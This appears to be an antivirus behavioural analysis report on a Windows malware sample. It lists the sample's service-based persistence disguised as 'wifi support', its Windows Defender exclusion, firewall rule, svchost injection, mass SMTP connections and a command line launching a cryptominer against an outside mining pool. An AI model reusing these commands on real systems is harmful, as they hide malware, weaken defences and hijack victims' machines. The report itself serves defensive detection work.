Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\ipafgbka] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ipafgbka] 'ImagePath' = '%WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\ipafgbka] 'ImagePath' = '%WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe'
Creates the following services
- 'ipafgbka' %WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe /d"<Full path to file>"
- 'ipafgbka' %WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\ipafgbka' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\vpacpjrq.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\vpacpjrq.exe to %WINDIR%\syswow64\ipafgbka\vpacpjrq.exe
Deletes itself.
Network activity
Connects to
- 'mi##########m.mail.protection.outlook.com':25
- 'mx#######902.gslb.pphosted.com':25
- 'ASPMX.L.GOOGLE.com':25
- 'mx#######301.gslb.pphosted.com':25
- 'fn########ale-com.safesysmail.com':25
- 'mx.#p.pl':25
- 'mx###.comcast.net':25
- 'ab####.abcwarehouse.com':25
- 'mx#######601.gslb.pphosted.com':25
- 'mx##.#-online.de':25
- 'i.###tagram.com':443
- 'mx#######e01.gslb.pphosted.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx.####iciodecorreo.es':25
- 'mx#######e02.gslb.pphosted.com':25
- 'mx#######a02.gslb.pphosted.com':25
- 'mx#######702.gslb.pphosted.com':25
- 'smtp.google.com':25
- 'mx##.schlund.de':25
- 'alt1.aspmx.l.google.com':25
- 'mx#######001.gslb.pphosted.com':25
- 'mx##.###g.kundenserver.de':25
- 'mx##.###us-vadesecure.net':25
- 'eb#y.es':443
- 'mx.##s.untd.com':25
- 'mx.##a.untd.com':25
- '80.##.75.254':482
- 'mx#.#aver.com':25
- 'mx.#len.pl':25
- '17#.#13.115.153':426
- '17#.#13.115.154':426
- '17#.#13.115.155':426
- '80.#6.75.4':426
- '17#.#13.115.156':426
- '17#.#13.115.157':426
- 'mx.###oserver.ch':25
- 'tm######.mx.a.cloudfilter.net':25
- 'google.com':80
- 'mx.###zta.onet.pl':25
- 'fa#####.grames.polymtl.ca':443
- 'mx#.#eznam.cz':25
- 'mx.##teria.pl':25
- 'r-####3.korea.com':25
- 'fa###ool.xyz':10060
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'in###gram.com':443
- 'mx#.###069-42.iphmx.com':25
- 'sv####lfheim.top':443
- 'li####ingstep.com':443
- 'em##.freenet.de':25
TCP
HTTP GET requests
- http://www.google.com/
Other
- 'sv####lfheim.top':443
- 'smtp.google.com':25
- 'mx.####iciodecorreo.es':25
- 'ff######x-vip2.prodigy.net':25
- 'tm######.mx.a.cloudfilter.net':25
- 'fn########ale-com.safesysmail.com':25
- 'ASPMX.L.GOOGLE.com':25
- 'mx#.###069-42.iphmx.com':25
- 'eb#y.es':443
- 'in###gram.com':443
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'fa###ool.xyz':10060
- 'alt1.aspmx.l.google.com':25
- 'mx.##teria.pl':25
- 'fa#####.grames.polymtl.ca':443
- 'mx.###zta.onet.pl':25
- 'li####ingstep.com':443
- 'mx#.#aver.com':25
- '17#.#13.115.157':426
- '17#.#13.115.154':426
- '17#.#13.115.156':426
- '17#.#13.115.153':426
- '17#.#13.115.155':426
- '80.#6.75.4':426
- '80.##.75.254':482
- 'mx#.#eznam.cz':25
- 'mx.###oserver.ch':25
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK my###ropcs.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK le##to.com
- DNS ASK mx##.#-online.de
- DNS ASK t-##line.de
- DNS ASK gr####academy.org
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK ci##as.com
- DNS ASK tm######.mx.a.cloudfilter.net
- DNS ASK ab####.abcwarehouse.com
- DNS ASK mx###.comcast.net
- DNS ASK co##ast.net
- DNS ASK mx.#p.pl
- DNS ASK wp.pl
- DNS ASK ot##.com
- DNS ASK fn########ale-com.safesysmail.com
- DNS ASK fn####rksdale.com
- DNS ASK mx#######301.gslb.pphosted.com
- DNS ASK ab####ehouse.com
- DNS ASK pa##ell.net
- DNS ASK ff######x-vip2.prodigy.net
- DNS ASK rc####rquesta.com
- DNS ASK mx.###oserver.ch
- DNS ASK we###erver.ch
- DNS ASK vs##lub.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK rn.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK ju###earit.com
- DNS ASK mx##.schlund.de
- DNS ASK ha##gan.com
- DNS ASK smtp.google.com
- DNS ASK mx#######702.gslb.pphosted.com
- DNS ASK co##ast.com
- DNS ASK mx#######a02.gslb.pphosted.com
- DNS ASK tj#.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK va###ard.com
- DNS ASK te##s.net
- DNS ASK bl###rossmn.com
- DNS ASK mx.####iciodecorreo.es
- DNS ASK fl######decoroutlets.com
- DNS ASK fr##net.de
- DNS ASK ASPMX.L.GOOGLE.com
- DNS ASK mx#######902.gslb.pphosted.com
- DNS ASK em##l.cz
- DNS ASK fa#####.grames.polymtl.ca
- DNS ASK mx.###zta.onet.pl
- DNS ASK on#t.pl
- DNS ASK li####ingstep.com
- DNS ASK i.###tagram.com
- DNS ASK google.com
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK mx#.#eznam.cz
- DNS ASK mx.#len.pl
- DNS ASK mx#.#aver.com
- DNS ASK na##r.com
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK sv####lfheim.top
- DNS ASK o2.pl
- DNS ASK in##ria.pl
- DNS ASK mx.##teria.pl
- DNS ASK ko##a.com
- DNS ASK re#.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK pe###epc.com
- DNS ASK op.pl
- DNS ASK mx##.###g.kundenserver.de
- DNS ASK on##ne.de
- DNS ASK eb#y.es
- DNS ASK mx.##s.untd.com
- DNS ASK ne##ero.net
- DNS ASK mx.##a.untd.com
- DNS ASK ne##ero.com
- DNS ASK mx#.###069-42.iphmx.com
- DNS ASK mm#.com
- DNS ASK in###gram.com
- DNS ASK se##am.cz
- DNS ASK mx#.###.#ailpod9-cph3.one.com
- DNS ASK bo##ten.com
- DNS ASK fa###ool.xyz
- DNS ASK r-####3.korea.com
- DNS ASK th###cool.com
- DNS ASK em##.freenet.de
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\ipafgbka\vpacpjrq.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ipafgbka\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\vpacpjrq.exe" %WINDIR%\SysWOW64\ipafgbka\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create ipafgbka binPath= "%WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description ipafgbka "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start ipafgbka' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ipafgbka\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\vpacpjrq.exe" %WINDIR%\SysWOW64\ipafgbka\
- '%WINDIR%\syswow64\sc.exe' create ipafgbka binPath= "%WINDIR%\SysWOW64\ipafgbka\vpacpjrq.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description ipafgbka "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start ipafgbka
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half